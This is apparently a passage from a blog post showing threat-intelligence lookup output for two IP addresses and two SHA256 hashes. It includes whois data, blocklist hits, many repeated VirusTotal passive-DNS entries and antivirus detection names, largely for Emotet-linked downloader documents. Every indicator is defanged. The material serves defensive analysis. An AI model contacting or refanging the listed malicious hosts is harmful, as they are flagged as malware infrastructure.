[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://192[.]99.251.50/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 217.182.143.248
* Observable type: ipv4 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] IP Whois Results
[-] ASN Information: (‘16276’, ‘217[.]182.0.0/16’, ‘2001-03-02’, ‘ripencc’, ‘FR’)
[-] Network Information: (‘217[.]182.0.0/16’, ‘FR-OVH-20010302’, ‘217[.]182.0.0 – 217[.]182.255.255’)
[-] Registration Info: (‘2017-02-20’, ‘2017-02-20’)
[-] Registration Locality: FR
[-] Abuse Email: abuse@ovh[.]net
[+] IPVoid Results
[-] Number of detections: 3
[-] IP Void Detection Rate: 3%
[-] Engines: (‘IPsum’, ‘hXXps://github[.]com/stamparm/ipsum’)
[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps)://www[.]redstout[.]com/index[.]html’)
[-] Engines: (‘Snapt NovaSense’, ‘hXXps://novasense-threats[.]com/’)
[-] No Malc0de Results
[+] AbuseIPDB Results
[-] AbuseIPDB reports: 7
[-] No SANS Results
[+] Fortinet Category Results
[-] Fortinet URL Category: Malicious Websites
[+] VirusTotal pDNS Results
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248:8080/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps://217[.]182.143.248/’)
[-] No McAfee Threat Results
[-] No ThreatCrowd IP Report Results
[-] No GreyNoise Results

********************************************************************************
* Information for 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] VirusTotal File Report Results
[-] Date submitted: 2022-03-15 16:55:14
[-] Detected engines: 30
[-] Total engines: 60
[-] Scans: (‘DrWeb’, ‘X97M[.]DownLoader.929’)
[-] Scans: (‘MicroWorld-eScan’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘FireEye’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘CAT-QuickHeal’, ‘DOC[.]Emotet.45887’)
[-] Scans: (‘Sangfor’, ‘Malware.Generic-XLM[.]Save[.]ma35’)
[-] Scans: (‘Alibaba’, ‘TrojanDownloader:VBA/MalDoc[.]ali1000101’)
[-] Scans: (‘K7GW’, ‘Trojan ( 0058ce181 )’)
[-] Scans: (‘K7AntiVirus’, ‘Trojan ( 0058ce181 )’)
[-] Scans: (‘Arcabit’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘Cyren’, ‘XLSM/Downldr.A[.]aggr!Camelot’)
[-] Scans: (‘ESET-NOD32’, ‘multiple detections’)
[-] Scans: (‘TrendMicro-HouseCall’, ‘TROJ_FRS[.]VSNTCE22’)
[-] Scans: (‘Avast’, ‘VBS:Malware-gen’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
[-] Scans: (‘BitDefender’, ‘Trojan[.]Vita.6’)
[-] Scans: (‘Emsisoft’, ‘Trojan[.]Vita.6 (B)’)
[-] Scans: (‘TrendMicro’, ‘TROJ_FRS[.]VSNTCE22’)
[-] Scans: (‘McAfee-GW-Edition’, ‘X97M/Downloader[.]kj’)
[-] Scans: (‘Sophos’, ‘Troj/DocDl-AFRE’)
[-] Scans: (‘GData’, ‘Macro.Trojan-Downloader[.]Agent[.]BDH’)
[-] Scans: (‘Antiy-AVL’, ‘Trojan/Generic[.]ASMalwRG.167’)
[-] Scans: (‘Microsoft’, ‘TrojanDownloader:O97M/Emotet[.]PKCL!MTB’)
[-] Scans: (‘ZoneAlarm’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
[-] Scans: (‘AhnLab-V3’, ‘Downloader/XML[.]XlmMacro.S1774’)
[-] Scans: (‘McAfee’, ‘Downloader-FCHG!CAB6670DF74A’)
[-] Scans: (‘MAX’, ‘malware (ai score=85)’)
[-] Scans: (‘Zoner’, ‘Probably Heur.W97ShellN’)
[-] Scans: (‘Rising’, ‘Downloader[.]Agent/XLM!1.DC56 (CLASSIC)’)
[-] Scans: (‘Fortinet’, ‘MSExcel/Agent[.]DVP!tr’)
[-] Scans: (‘AVG’, ‘VBS:Malware-gen’)
[+] MetaDefender File Report Results
[-] Date submitted: 2022-03-15T17:04:08.882Z
[-] Detected engines: 6
[-] Total engines: 35
[-] Scans: (‘Cyren’, ‘XLSM/Downldr.A[.]aggr!Camelot’)
[-] Scans: (‘IKARUS’, ‘Trojan-Downloader[.]XLM[.]Agent’)
[-] Scans: (‘Kaspersky’, ‘HEUR:Trojan.MSOffice[.]Emotet[.]gen’)
[-] Scans: (‘McAfee’, ‘X97M/Downloader[.]kj’)
[-] Scans: (‘RocketCyber’, ”)
[-] Scans: (‘Sophos’, ‘Troj/DocDl-AFRE’)
[-] Scans: (‘Webroot SMD’, ”)
[-] Scans: (‘Jiangmin’, ‘Unavailable (production)’)
[-] Scans: (‘Scrutiny’, ”)
[-] Scans: (‘Vir[.]IT eXplorer’, ‘X97M[.]Emotet[.]DGN’)

********************************************************************************
* Information for a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22
* Observable type: hash.sha256 (Auto-detected: True)
********************************************************************************
Not seeing what you expect? Likely not a valid site. Try running with –list-sites

[+] VirusTotal File Report Results
[-] Date submitted: 2022-03-15 01:13:22
[-] Detected engines: 4
[-] Total engines: 65
[-] Scans: (‘Kaspersky’, ‘VHO:Trojan-Banker.Win32[.]Convagent[.]gen’)
[-] Scans: (‘Antiy-AVL’, ‘Trojan/Generic[.]ASCommon.21F’)
[-] Scans: (‘Microsoft’, ‘Trojan:Win32/Sabsik[.]FL.B!ml’)
[-] Scans: (‘Rising’, ‘Trojan[.]Kryptik!8.8 (C64:YzY0Oh/jx0YklSUX)’)
[+] MetaDefender File Report Results
[-] Detected engines: 1
[-] Total engines: 1
[-] Scans: (‘Avira’, ‘TR/AD[.]Nekark.a6565a’)

Leave a Reply

Your email address will not be published. Required fields are marked *